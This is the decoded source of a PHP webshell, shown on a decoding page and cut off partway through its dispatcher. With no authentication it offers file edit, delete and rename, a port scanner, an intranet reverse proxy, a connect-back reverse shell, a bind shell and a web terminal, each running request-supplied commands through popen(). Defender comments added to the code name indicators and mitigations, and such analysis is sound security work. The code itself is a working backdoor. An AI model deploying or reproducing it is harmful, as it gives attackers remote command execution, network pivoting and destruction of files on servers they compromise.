
PHP Decode

<?php session_start(); error_reporting(E_ALL); function read_file($file_name) { $fp = f..

Decoded Output download

<?php

session_start();
error_reporting(E_ALL);

/**
 * Echo the contents of a file to the output stream, line by line.
 *
 * Lines are read in chunks of at most 1023 bytes. Reading stops at end of
 * file or at the first chunk that compares loosely equal to false.
 *
 * @param string $file_name path to open for reading
 * @return int 0 once the file has been echoed, -1 if it cannot be opened
 */
function read_file($file_name)
{
	$handle = fopen($file_name, "r");
	if (!$handle) {
		echo "open $file_name failed.
";
		return -1;
	}

	for (;;) {
		$chunk = fgets($handle, 1024);
		if ($chunk == false) {
			break;
		}
		echo $chunk;
	}

	fclose($handle);
	return 0;
}

function copy_file($src_file, $dst_file)
{
	$src_fp = fopen($src_file, "r");
	if ($src_fp == false) {
		echo "open $src_file failed.
";
		return -1;
	}

	$dst_fp = fopen($dst_file, "w+");
	if ($dst_fp == false) {
		fclose($src_fp);
		return -1;
	}

	while (($buf = fgets($src_fp, 1024)) != false) {
		if (fwrite($dst_fp, $buf, strlen($buf)) == false) {
			echo "fwrite failed.
";
			fclose($src_fp);
			fclose($dst_fp);
			return -1;
		}
	}

	fclose($src_fp);
	fclose($dst_fp);
	return 0;
}

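/**
 * Copy $src_file to $dst_file with copy() and report the outcome on stdout.
 *
 * NOTE(review): both paths are echoed as-is; wherever this output is rendered
 * as HTML they should go through htmlspecialchars() first.
 *
 * @param string $src_file existing file to copy
 * @param string $dst_file destination path
 * @return int 0 on success, -1 if the source is missing or copy() fails
 */
function copy_file_binary($src_file, $dst_file)
{
	if (file_exists($src_file) == false) {
		echo "file $src_file not exist.
";
		return -1;
	}

	if (copy($src_file, $dst_file) == false) {
		// The message used "$src", a variable that does not exist in this
		// function, so the source path was missing from the failure report.
		echo "copy $src_file to $dst_file failed.
";
		return -1;
	}
	echo "copy $src_file to $dst_file ok.
";

	return 0;
}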

function delete_file($file_name)
{
	if (file_exists($file_name) == false) {
		echo "file $file_name not exist.";
		return -1;
	}

	if (unlink($file_name) == false) {
		echo "delete $file_name failed.";
		return -1;
	}
	echo "delete $file_name ok.
";

	return 0;
}

/**
 * Show, or overwrite, a file in the current working directory through an
 * HTML form.
 *
 * basename() drops any directory part, so only a bare name relative to the
 * working directory is opened. With no `newcontent` POST field the file is
 * printed inside a textarea; with one, the file is truncated ("w+") and the
 * posted bytes are written verbatim.
 *
 * Defender note: aio_main() calls this with $_GET['edit'] and nothing in
 * this file checks a credential or session first, so any requester can
 * rewrite whatever the PHP process user may write in that directory,
 * including other .php files. Unexpected modification times in the web root
 * and POST bodies carrying a `newcontent` field are the indicators; a
 * read-only web root and file-integrity monitoring are the mitigations.
 *
 * @param string $file_path requested path; only its basename is used
 * @return void
 */
function edit_file($file_path)
{
	$file_name = basename($file_path);

	if (empty($_POST['newcontent'])) {
		echo '<form action="" method="post">';

		// "@" suppresses the warnings these calls would raise on failure.
		$fp=@fopen($file_name, "r");
		$data=@fread($fp, filesize($file_name));
	
		echo '<textarea name="newcontent" cols="80" rows="20" >';
		// File content goes into the page without HTML escaping.
		echo $data;
		@fclose($fp);
		echo '</textarea>
		<input type="submit" value="Edit"/>
		</form>';
	}
	else {
		// Request-supplied content is written to disk unfiltered.
		$fp=@fopen($file_name, "w+");
		$result=@fwrite($fp, $_POST['newcontent']);
		@fclose($fp);
		if ($result == false) {
			echo "edit failed.";
		}
		else {
			echo "edit ok.";
		}
	}

}

function rename_file($old_file_name, $new_file_name)
{
	if (file_exists($old_file_name) == false) {
		echo "file $old_file_name not exist.
";
		return -1;
	}

	if (rename($old_file_name, $new_file_name) == false) {
		echo "rename $old_file_name to $new_file_name failed.
";
		return -1;
	}

	echo "rename $old_file_name to $new_file_name ok.
";
	return 0;
}

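/**
 * Format a byte count as a whole number followed by a binary unit.
 *
 * The value is divided by 1024 until it drops below 1024 or the largest
 * unit ("TB") is reached, then truncated with intval().
 *
 * @param int|float $bytes size in bytes
 * @return string e.g. "1 KB"
 */
function get_human_size($bytes)
{
	$units = array("Bytes", "KB", "MB", "GB", "TB");
	$last = count($units) - 1;
	$idx = 0;

	// Stop at the largest unit: without this bound, a value of 1024 TB or
	// more indexed past the end of the unit table.
	while ($bytes >= 1024 && $idx < $last) {
		$bytes /= 1024;
		$idx++;
	}

	return intval($bytes)." ".$units[$idx];
}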

/**
 * Return the permission bits of a path as a four-digit octal string.
 *
 * @param string $file_name path passed to fileperms()
 * @return string last four octal digits of the mode, e.g. "0644"
 */
function get_file_perms($file_name)
{
	$mode = fileperms($file_name);
	$octal = sprintf('%o', $mode);

	return substr($octal, -4);
}


/**
 * Render a path's mode as an `ls -l` style ten-character string.
 *
 * The first character is the file type (s, l, -, b, d, c, p, or u when no
 * type pattern matches). The remaining nine are the owner, group and other
 * rwx triads, where s/S and t/T replace x/- when the setuid, setgid or
 * sticky bit is set.
 *
 * @param string $file_name path passed to fileperms()
 * @return string e.g. "-rw-r--r--"
 */
function get_human_file_perms($file_name)
{
	$mode = fileperms($file_name);

	// Type masks in the order they are tested; a mask matches when all of
	// its bits are set in the mode.
	$type_letters = array(
		0xC000 => 's',
		0xA000 => 'l',
		0x8000 => '-',
		0x6000 => 'b',
		0x4000 => 'd',
		0x2000 => 'c',
		0x1000 => 'p',
	);

	$text = 'u';
	foreach ($type_letters as $mask => $letter) {
		if (($mode & $mask) == $mask) {
			$text = $letter;
			break;
		}
	}

	// Each row: read bit, write bit, execute bit, special bit, and the
	// letters shown when the special bit is set with / without execute.
	$triads = array(
		array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'),
		array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'),
		array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'),
	);

	foreach ($triads as $triad) {
		list($read, $write, $exec, $special, $with_exec, $without_exec) = $triad;

		$text .= ($mode & $read) ? 'r' : '-';
		$text .= ($mode & $write) ? 'w' : '-';

		if ($mode & $exec) {
			$text .= ($mode & $special) ? $with_exec : 'x';
		} else {
			$text .= ($mode & $special) ? $without_exec : '-';
		}
	}

	return $text;
}

function get_file_owner($file_name)
{
	$uid=fileowner($file_name);
        $user_info = posix_getpwuid($uid);

        return $user_info['name'];
}

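/**
 * Print the path of every entry in $dir_path, one per line ("." and ".."
 * are skipped).
 *
 * @param string $dir_path directory to list
 * @return int 0 when the listing completes or $dir_path is not a directory,
 *             -1 when the directory cannot be opened
 */
function read_dir($dir_path)
{
	// Not a directory: nothing was opened, so there is nothing to close.
	// The original fell through to closedir() on an unset handle here.
	if (!is_dir($dir_path)) {
		return 0;
	}

	$dp = opendir($dir_path);
	if ($dp === false) {
		echo "open $dir_path failed.
";
		return -1;
	}

	// Strict comparison so an entry literally named "0" does not end the
	// listing early.
	while (($file_name = readdir($dp)) !== false) {
		if ($file_name === "." || $file_name === "..") {
			continue;
		}
		echo $dir_path."/".$file_name."
";
	}

	closedir($dp);
	return 0;
}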

function read_dirs($dir_path)
{
	echo '
<table>
<tr class="banner">
<td width="400" >Filename</td>
<td width="400" >Last modified</td>
<td width="400" >Size</td>
<td width="400" >Chmod/Perms</td>
<td width="400" >Action</td>
</tr>';

        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.
";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;
                        $sub_path = $dir_path."/".$file_name;
			$last_modify_time=date("Y/m/d H:i:s", fileatime($file_name));
			$file_size=filesize($file_name);
			$file_size_string=get_human_size($file_size);
			$file_perms=get_file_perms($file_name);
			$file_perms_string=get_human_file_perms($file_name);
			$file_owner=get_file_owner($file_name);
			
			echo '<tr class="directory">
			<td width="400" ><a href='.$file_name.'>'.$file_name.'</a></td>
			<td width="400" >'.$last_modify_time.'</td>
			<td width="400" >'.$file_size_string.'</td>
			<td width="400" >'.$file_perms.' / '.$file_perms_string.' / '.$file_owner.'</td>
			<td width="400" ><a href="webshell.php?delete='.$file_name.'"'.'>Delete </a>
				<a href="webshell.php?edit='.$file_name.'"'.'>Edit </a>
				<a href="webshell.php?download='.$file_name.'"'.'>Download </a>
				<a href="webshell.php?rename='.$file_name.'"'.'>Rename </a>
			</td>
			</tr>';

                }
        }

	echo '</table>';

        closedir($dp);
        return 0;
}

function aio_directory()
{
	$curr_path=getcwd();

	return read_dirs($curr_path);
}


function search_file_by_name($dir_path, $target_file)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.
";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;

                        $sub_path = $dir_path."/".$file_name;
                        if (is_dir($sub_path)) {
                                search_file_by_name($sub_path, $target_file);
                        }

			if (!strcmp($file_name, $target_file)) {
				echo "found $target_file.
";
				closedir($dp);
				return 0;
			}
                }

		echo "not found $target_file.
";
        	closedir($dp);
        }

        return -1;
}

/**
 * show files that have a certain attribute flag.
 *
 * @dir_path - directory to search.
 * @attr_flag - 0 readable.
 *            - 1 writable.
 *            - 2 executable.
 */
function show_attr_file($dir_path, $attr_flag)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.
";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) { 
                        if ($file_name == "." || $file_name == "..")
                                continue;

                        $sub_path = $dir_path."/".$file_name;
                        if (is_dir($sub_path)) {
                                show_attr_file($sub_path, $attr_flag);
                        }
		
			if ($attr_flag == 0) {
				if (is_readable($file_name)) 
					echo "$sub_path
";
			}
			else if ($attr_flag == 1) {
				if (is_writable($file_name)) 
					echo "$sub_path
";
			}
			else if ($attr_flag == 2) {
				if (is_executable($file_name)) 
					echo "$sub_path
";
			}
			else {
				echo "wrong attribute flag.
";
				break;
			}
		}
		closedir($dp);
	}

	return 0;
}

function create_dir($dir_path)
{
	if (file_exists($dir_path))
		return -1;

	if (mkdir($dir_path, 0700) == false) {
		echo "create $dir_path failed.
";
		return -1;
	}
	echo "create $dir_path ok.
";
	return 0;
}

function destroy_dir($dir_path)
{
	if (file_exists($dir_path) == false)
		return -1;

	if (rmdir($dir_path) == false) {
		echo "delete $dir_path failed.
";
		return -1;
	}

	echo "delete $dir_path ok.
";
	return 0;
}

function destroy_dirs($dir_path)
{
        if (is_dir($dir_path)) {
                if (($dp = opendir($dir_path)) == false) {
                        echo "open $dir_path failed.
";
                        return -1;
                }
                while (($file_name = readdir($dp)) != false) {
                        if ($file_name == "." || $file_name == "..")
                                continue;
                        $sub_path = $dir_path."/".$file_name;

                        if (is_dir($sub_path)) {
                                destroy_dirs($sub_path);
                        }
			else
				delete_file($sub_path);
                }

        	closedir($dp);
		destroy_dir($dir_path);
        	return 0;
        }

        return 0;
}

function linux_id()
{
	$uid = posix_getuid();
	$user_info = posix_getpwuid($uid);

	echo "uid=".$uid."(".$user_info['name'].") ";
	echo "gid=".$user_info['gid']."(".$user_info['name'].") ";
	echo "dir=".$user_info['dir']." ";
	echo "shell=".$user_info['shell']."
";
}

function linux_uname()
{
	$uname = posix_uname();

	echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." ";
	echo $uname['version']." ".$uname['machine'];
}

function get_proc_name($file_name)
{
        $fp = fopen($file_name, "r");
        if ($fp == false) {
                echo "open $file_name failed.
";
                return -1;
        }

        while (($buf = fgets($fp, 1024)) != false ) {
		if (strstr($buf, "Name:") != NULL) {
			sscanf($buf, "%s %s", $tmp, $name);
			fclose($fp);
			return $name;
		}
        }

        fclose($fp);
        return 0;
}

function get_proc_cmd($file_name)
{
        $fp = fopen($file_name, "r");
        if ($fp == false) {
                echo "open $file_name failed.
";
                return -1;
        }

	$cmd = fgets($fp, 1024);
	fclose($fp);

	return $cmd;
}

function linux_ps()
{
	if (($dp = opendir("/proc")) == false) {
		echo "open /proc failed.
";
		return -1;
	}
	echo "open /proc ok.
";

        while (($file_name = readdir($dp)) != false) {
        	if ($file_name == "." || $file_name == "..")
        		 continue;

		if (ctype_digit($file_name) == false)
			continue;
		
		$dir_path = "/proc/$file_name/status";
		$proc_name = get_proc_name($dir_path);

		$dir_path = "/proc/$file_name/cmdline";
		$proc_cmd = get_proc_cmd($dir_path);

		echo $file_name."		".$proc_name." ".$proc_cmd."
";
	}

	closedir($dp);
	return 0;
}

function tcp_connect($host, $port)
{
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	if ($socket == false) {
		echo "create socket error.
";
		return -1;
	}

	if (@socket_connect($socket, $host, $port) == false) {
		socket_close($socket);
		return -1;
	}

	return $socket;
}

function tcp_connect_timeout($host, $port, $timeout)
{
	$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
	if ($socket == false) {
		echo "create socket error.
";
		return -1;
	}

	if (socket_set_nonblock($socket) == false) {
		echo "set nonblock error.
";
		socket_close($socket);
		return -1;
	}

	$time = time();
	while (!@socket_connect($socket, $host, $port)) {
		$err = socket_last_error($socket);
		if ($err == 115 || $err == 114) {
			if ((time() - $time) >= $timeout) {
				socket_close($socket);
				echo "socket timeout.
";
				return -1;
			}
			sleep(1);
			continue;
		}
		socket_close($socket);
		return -1;
	}
	
	echo "connect to $host:$port ok.
";
	return $socket;
}

function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2)
{
        $socket1 = tcp_connect($remote_host1, $remote_port1);
        if ($socket1 == -1) {
                echo "connect to $remote_host1:$remote_port1 failed.
";
                return -1;
        }
        echo "connect to $remote_host1:$remote_port1 ok.
";

        $socket2 = tcp_connect($remote_host2, $remote_port2);
        if ($socket2 == -1) {
                echo "connect to $remote_host2:$remote_port2 failed.
";
                socket_close($socket1);
                return -1;
        }
        echo "connect to $remote_host2:$remote_port2 ok.
";

        run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2);

        return 0;
}

function web_proxy_client()
{
        echo '<html><head><style>
                h3.banner
                {
                text-align:center;
                color:#384850;
                font-weight:bold;
                }
                form
                {
                text-align:center;
                }
                input[type=text]
                {
                width:300px;
                color:#384850;
                background-color:#ffffff;
                }
                input[type=submit]
                {
                width:80px;
                color:#384850;
                background-color:#ffffff;
                }
                </head></style>
                <body>
		<h3 class="banner">Linux reverse proxy</h3>
                <form action="" method="post">
		<b>intranet host</b>
                <input type="text" name="intranet_host" />
                <b>intranet port</b>
                <input type="text" name="intranet_port" /><br />
		<b>public host</b>
                <input type="text" name="public_host" />
                <b>public   port</b>
                <input type="text" name="public_port" /><br /><br />
                <input type="submit" value="Run" />
                </form>
                </body>
                </html>';

        if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) || 
		empty($_POST['public_host']) ||  empty($_POST['public_port']))
                return -1;

	run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'],
			$_POST['public_host'], $_POST['public_port']);
}

function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2)
{
        while (true) {
                $read_sockets = array($socket1, $socket2);
                $write_sockets = NULL;
                $except_sockets = NULL;

                if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) {
                        echo "socket_select error ".socket_strerror(socket_last_error())."
";
                        break;
                }

                if (in_array($socket2, $read_sockets)) {
                        //echo "got data from $remote_host2.
";

                        $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT);
                        if ($bytes2 == false) {
                                echo "socket_recv ".socket_strerror(socket_last_error($socket2))."
";
                                break;
                        }
                        //echo "got bytes $bytes2.
";

                        if ($bytes2 == 0) {
                                echo "recv no data from $remote_host2.
";
                                break;
                        }

                        $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR);
                        if ($ret2 == false) {
                                echo "socket_send ".socket_strerror(socket_last_error($socket1))."
";
                                break;
                        }
                        if ($ret2 != $bytes2) {
                                echo "send data failed.
";
                                break;
                        }
                        //echo "write $ret2 bytes ok.
";
                }
                if (in_array($socket1, $read_sockets)) {
                        //echo "got data from $remote_host1.
";

                        $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT);
                        if ($bytes1 == false) {
                                echo "socket_recv ".socket_strerror(socket_last_error($socket1))."
";
                                break;
                        }
                        //echo "got bytes $bytes1.
";

                        if ($bytes1 == 0) {
                                echo "recv no data from $remote_host1.
";
                                break;
                        }

                        $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR);
                        if ($ret1 == false) {
                                echo "socket_send ".socket_strerror(socket_last_error($socket2))."
";
                                break;
                        }
                        if ($ret1 != $bytes1) {
                                echo "send data failed.
";
                                break;
                        }
                        //echo "write $ret1 bytes ok.
";
                }
        }

        echo "proxy done.
";
        socket_close($socket1);
        socket_close($socket2);

        return 0;
}

function init_proxy_server($local_port)
{
        $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if ($socket == false) {
                echo "create socket error.
";
                return -1;
        }

        if (socket_bind($socket, '0', $local_port) == false) {
                echo "bind sock error.
";
                socket_close($socket);
                return -1;
        }

        if (socket_listen($socket) == false) {
                echo "listen sock error.
";
                socket_close($socket);
                return -1;
        }
        echo "listen on port $local_port ok.
";

        return $socket;
}


function run_proxy_server($local_port1, $local_port2)
{
        $socket1 = init_proxy_server($local_port1);
        if ($socket1 == -1)
                return -1;

        while (true) {
                if (($newsock1 = socket_accept($socket1)) !== false) {
                        socket_getpeername($newsock1, $ip1);
                        echo "got a client form $ip1
";
                        break;
                }
        }
        $socket2 = init_proxy_server($local_port2);
        if ($socket2 == -1)
                return -1;

        while (true) {
                if (($newsock2 = socket_accept($socket2)) !== false) {
                        socket_getpeername($newsock2, $ip2);
                        echo "got a client form $ip2
";
                        break;
                }
        }

        echo "start transmit data ...
";
        run_proxy_core($newsock2, $ip2, $newsock1, $ip1);

        socket_close($socket2);
        socket_close($socket1);

        return 0;
}

function tcp_connect_port($host, $port, $timeout)
{
	$fp = @fsockopen($host, $port, $errno, $errstr, $timeout);
		
	return $fp;
}

function port_scan_fast($host, $timeout, $banner)
{
$general_ports = array(
		'21'=>'FTP',
		'22'=>'SSH',
		'23'=>'Telnet',
		'25'=>'SMTP',
		'79'=>'Finger',
		'80'=>'HTTP',
		'81'=>'HTTP/Proxy',
		'110'=>'POP3',
		'135'=>'MS Netbios',
		'139'=>'MS Netbios',
		'143'=>'IMAP',
		'162'=>'SNMP',
		'389'=>'LDAP',
		'443'=>'HTTPS',
		'445'=>'MS SMB',
		'873'=>'rsync',
		'1080'=>'Proxy/HTTP Server',
		'1433'=>'MS SQL Server',
		'2433'=>'MS SQL Server Hidden',
		'1521'=>'Oracle DB Server',
		'1522'=>'Oracle DB Server',
		'3128'=>'Squid Cache Server',
		'3129'=>'Squid Cache Server',
		'3306'=>'MySQL Server',
		'3307'=>'MySQL Server',
		'3500'=>'Squid Cache Server',
		'3389'=>'MS Terminal Service',
		'5800'=>'VNC Server',
		'5900'=>'VNC Server',
		'8080'=>'Proxy/HTTP Server',
		'10000'=>'Webmin',
		'11211'=>'Memcached'
		);

	echo '<table>';
		
	foreach($general_ports as $port=>$name) {
		if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
			if (empty($banner) == false) {
				$data = fgets($fp, 128);
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$name.'</td>
					<td>'.$data.'</td>
					</tr>';
			}
			else {
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$name.'</td>
					</tr>';
			}
			fclose($fp);
		}
	} 
	echo '</table>';
}

/**
 * Try a TCP connection to every port from $src_port to $dst_port on $host
 * and print an HTML table row for each one that accepts.
 *
 * When $banner is non-empty, up to 127 bytes read from the open port are
 * shown in place of the word OPEN.
 *
 * Defender note: run_portscan() calls this with request-supplied host and
 * timeout values and the fixed range "1".."65535", so the web server itself
 * becomes the scan origin and can reach hosts the requester cannot. A web
 * server process opening many short-lived outbound connections to
 * sequential ports on one address is the network indicator; egress rules
 * that deny new outbound connections from web workers remove the capability.
 * $host and the banner bytes are written into the page without escaping.
 *
 * @return void
 */
function port_scan($host, $src_port, $dst_port, $timeout, $banner)
{
	echo '<table>
		<tr>
		<td>Host</td>
		<td>Port</td>
		<td>State</td>
		</tr>';

        for ($port = $src_port; $port <= $dst_port; $port++) {
		// tcp_connect_port() wraps fsockopen() with "@", so refused or
		// timed-out ports raise no warning.
		if (($fp = tcp_connect_port($host, $port, $timeout)) != false) {
			if (empty($banner) == false) {
				$data = fgets($fp, 128);
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>'.$data.'</td>
					</tr>';
			}
			else {
				echo '<tr>
					<td>'.$host.'</td>
					<td>'.$port.'</td>
					<td>OPEN</td>
					</tr>';
			}
			fclose($fp);
		}
        }
	echo '</table>';
}


function run_portscan()
{
	echo '<html>
		<head>
		<style>
		tr.directory
		{
		font-size:14px;
		text-align:left;
		height:20px;
		border:1px solid #98bf21;
		padding:2px 6px 2px 6px;
		}
		</style>
		</head>
		<body>
		<form action="" method="post">
		target host
		<input type="text" name="scan_host" value="127.0.0.1" />
		timeout
		<input type="text" name="scan_timeout" value="5" />
		general ports
		<input type="checkbox" name="scan_fast" />
		banner
		<input type="checkbox" name="scan_banner" />
		<input type="submit" value="scan" />
		</form>
		</body>
		</html>';

	if (empty($_POST['scan_host']))
		return -1;
	
	if (isset($_POST['scan_fast'])) {
		port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'], 
				$_POST['scan_banner']);
	}
	else {
		port_scan($_POST['scan_host'], "1", "65535", 
				$_POST['scan_timeout'], 
				$_POST['scan_banner']);
	}
}

/**
 * Run $cmd through popen() and write each line of its output to $socket.
 *
 * Defender note: both callers in this file (connect_backdoor() and
 * bindshell()) pass bytes just read from a network socket as $cmd, with no
 * authentication or filtering, which makes this the remote command
 * execution primitive of the shell. Listing popen in PHP's
 * disable_functions stops it; a web-server worker spawning a shell process
 * is the host-side signal to alert on.
 *
 * @return int 0 after the output is drained, -1 when socket_write() reports
 *             failure or zero bytes
 */
function linux_exec($socket, $cmd)
{
        // popen()'s result is not checked before it is read from.
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
                $ret = socket_write($socket, $buf, strlen($buf));
                if ($ret == false) {
                        // This early return skips pclose().
                        return -1;
                }
        }

        pclose($handle);
        return 0;
}

/**
 * Open an outbound TCP connection to $host:$port, send a fixed banner, then
 * execute whatever arrives on the socket via linux_exec().
 *
 * Defender note: run_backdoor() supplies $host and $port from the
 * `target_host` and `target_port` POST fields, so the destination is chosen
 * by the requester. The connection is initiated by the web server, which
 * lets it pass inbound-only firewalls; egress filtering on web workers
 * blocks it. The literal banner "connect back from phpshell" is sent in
 * clear text as the first bytes and is usable as a network signature.
 *
 * @return int -1 when the connection or the banner write fails; the command
 *             loop itself has no exit
 */
function connect_backdoor($host, $port)
{
        $banner = "connect back from phpshell
";

        $socket = tcp_connect($host, $port);
        if ($socket == -1) {
		echo "connect to $host:$port failed.
";
                return -1;
	}
	echo "connect to $host:$port ok.
";

        $ret = socket_write($socket, $banner, strlen($banner));
        if ($ret == false) {
		echo "write data failed.
";
                socket_close($socket);
                return -1;
        }

        // socket_read()'s result is never checked, so the loop keeps running
        // after the peer disconnects; each received buffer is also echoed
        // into the HTTP response.
        while (true) {
                $buf = socket_read($socket, 1024);
                echo $buf;
                linux_exec($socket, $buf);
        }
}

/**
 * Listen on $local_port, accept one client, send a fixed banner, then
 * execute whatever that client sends via linux_exec().
 *
 * Defender note: run_backdoor() passes the `bind_port` POST field as
 * $local_port. The accepted client is not authenticated. A new listening
 * socket owned by the web server's user on a port outside the expected
 * service set is the host indicator; default-deny ingress rules keep the
 * listener unreachable. The literal banner "bindshell from phpshell" is the
 * first data sent to the client and is usable as a network signature.
 *
 * @return int -1 when socket setup or the banner write fails; the command
 *             loop has no exit, so the trailing close/return lines are
 *             never reached
 */
function bindshell($local_port)
{
        $banner = "bindshell from phpshell
";

        $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
        if ($socket == false) {
                echo "create socket error.
";
                return -1;
        }

        // NOTE(review): the bind address '0' presumably resolves to the
        // wildcard address, i.e. every interface - confirm.
        if (socket_bind($socket, '0', $local_port) == false) {
                echo "bind sock error.
";
                socket_close($socket);
                return -1;
        }

        if (socket_listen($socket) == false) {
                echo "listen sock error.
";
                socket_close($socket);
                return -1;
        }
        echo "listen on port $local_port ok.
";

        // Loops until the first successful accept; the HTTP request that
        // started the listener stays open for that whole time.
        while (true) {
                if (($newsock = socket_accept($socket)) !== false) {
                        socket_getpeername($newsock, $ip);
                        echo "got a client form $ip"."<br />";
                        break;
                }
        }

        $ret = socket_write($newsock, $banner, strlen($banner));
        if ($ret == false) {
                echo "write data failed.
";
                socket_close($newsock);
                socket_close($socket);
                return -1;
        }

        // socket_read()'s result is never checked and the loop has no break.
        while (true) {
                $buf = socket_read($newsock, 1024);
                echo $buf;
                linux_exec($newsock, $buf);
        }

	socket_close($newsock);
	socket_close($socket);
	return 0;
}

function run_backdoor()
{
        echo '<html><head><style>
		h3.banner
		{
		text-align:center;
		color:#384850;
		font-weight:bold;
		}
		form
		{
		text-align:center;
		}
                input[type=text]
                {
                width:300px;
                color:#384850;
                background-color:#ffffff;
                }
                input[type=submit]
                {
                width:80px;
                color:#384850;
                background-color:#ffffff;
                }
		</head></style>
                <h3 class="banner" >Linux connect backdoor</h3>
                <form action="" method="post">
                Target host
                <input type="text" name="target_host" />
                Target port
                <input type="text" name="target_port" />
                <input type="submit" value="Connect" />
                </form>
		</br />
                <h3 class="banner" >Linux bindshell backdoor</h3>
                <form action="" method="post">
		Bind port
                <input type="text" name="bind_port" />
                <input type="submit" value="Bindshell" />
                </form>
		</html>';

        if ($_POST['target_host'] && $_POST['target_port']) {
                connect_backdoor($_POST['target_host'], $_POST['target_port']);
        }
	if ($_POST['bind_port']) {
		bindshell($_POST['bind_port']);
	}
}

/*
function exec_shell($cmd)
{
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
		echo $buf;
        }

        pclose($handle);
        return 0;
}

function run_shell()
{
	$host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
        $uid = posix_getuid();
        $user_info = posix_getpwuid($uid);

	echo '<html>
		<head>
		<style>
                input[type=text]
                {
                width:1130px;
                color:#384850;
                background-color:#ffffff;
                }
		textarea
		{
                width:1130px;
                color:#384850;
                background-color:#ffffff;
		}
		</style>
		</head>
		<body>
		<form action="" method="post">
		<font color="#384850">'.$user_info['name'].'@'.$host_name.'$</font>
		<input style="border:none" color="#384850" type="text" name="shellcmd" />
		<input style="border:none" color="#384850" type="submit" value="Execute" /><br /><br />
		<textarea name="textarea" cols="150" rows="30" readonly>';

	if ($_POST['shellcmd']) {
		//echo $user_info['name'].'@'.$host_name.'$';
		//echo $_POST['shellcmd'];
		exec_shell($_POST['shellcmd']);
		echo '</textarea></form></body></html>';
	}
}
*/

/**
 * Run $cmd through popen() and return everything it printed as one string.
 *
 * Defender note: aio_shell() calls this with $_POST['shellcmd'] unmodified,
 * so each POST carrying a `shellcmd` field runs one command as the PHP
 * process user. Web access logs normally do not record POST bodies, so
 * request-body logging or process auditing on the web server is what
 * reveals the commands; listing popen in disable_functions removes the
 * primitive.
 *
 * @param string $cmd command line handed to popen()
 * @return string|null collected output; $data is never initialised, so a
 *                     command with no output leaves it undefined
 */
function run_terminal_shell($cmd)
{
        // popen()'s result is not checked before it is read from.
        $handle = popen($cmd, "r");

        while (($buf = fgets($handle, 1024)) != false) {
                $data .= $buf."";
        }

        pclose($handle);
        return $data;
}

function aio_shell()
{
        $host_name = gethostbyaddr($_SERVER['SERVER_NAME']);
        $uid = posix_getuid();
        $user_info = posix_getpwuid($uid);
	$curr_path = getcwd();
	$prompt=$user_info['name'].'@'.$host_name.':'.$curr_path;

        echo '<html>
        <head>
        <style>
        tr.banner
        {
        font-size: 18px;
        font-style:italic;
        color:#ffffff;
        background-color: #285070;
        }
        tr.prompt
        {
        font-size: 14px;
        color:#285800;
        background-color: #000000;
        }
        textarea {border: none; margin: 0px; padding: 2px 2px 2px; color: #285800; background-color: #000000;}
        input
        {
        color: #285800; background-color: #000000;
        }
        </style>
        <script type="text/javascript" language="JavaScript">
        function init()
        {
                document.shell.output.scrollTop = document.shell.output.scrollHeight;
        }
        </script>
        </head>
        <body onload="init()">
        <table align="center" border="0" width="600" cellpadding="0" cellspacing="0">
        <tr class="banner">
                <td width="10%"><b>TERMINAL</b></td>
                <td align="center">'.$prompt.'</td>
        </tr>

        <form name="shell" action="" method="post">
        <tr class="prompt">
        <td colspan="2" nowrap>
        <textarea name="output" rows="20" cols="90">';
        if ($_POST['shellcmd']) {
                $cmd_data = $prompt.'$'.$_POST['shellcmd']."
";
                $cmd_data .= run_terminal_shell($_POST['shellcmd']);
                $_SESSION['output'] .= $cmd_data;
                echo $_SESSION['output'];
        }

        echo '</textarea><br />'.$prompt.'$'.'
        <input style="border:none" type="text" name="shellcmd" />
        <input style="border:none" type="submit" value="" />
</td>
</tr>
</form>

<tr class="banner">
        <td align="center" height="20" colspan="2"> &copy wzt 2014 http://www.cloud-sec.org</td>
</tr>
</table>
</body>
</html>';

}

/**
 * Dispatch on the `cmd` query parameter, or print a link menu when it is
 * absent.
 *
 * Nothing in the visible file calls this function; the script's last
 * statement invokes aio_main(), which carries its own copy of the dispatch.
 * The menu links to cmd=showdir, for which no branch exists here.
 *
 * Defender note: no credential, token or session value is checked before a
 * handler runs, so reaching the URL is enough to use it. Requests whose
 * query string carries cmd=backdoor, cmd=shell, cmd=portscan or cmd=proxy,
 * and the hard-coded script name webshell.php in the links, are usable as
 * access-log and content indicators.
 *
 * @return void
 */
function webshell_main()
{
	if (isset($_GET['cmd'])) {
		if ($_GET['cmd'] == "backdoor") {
			run_backdoor();
		}
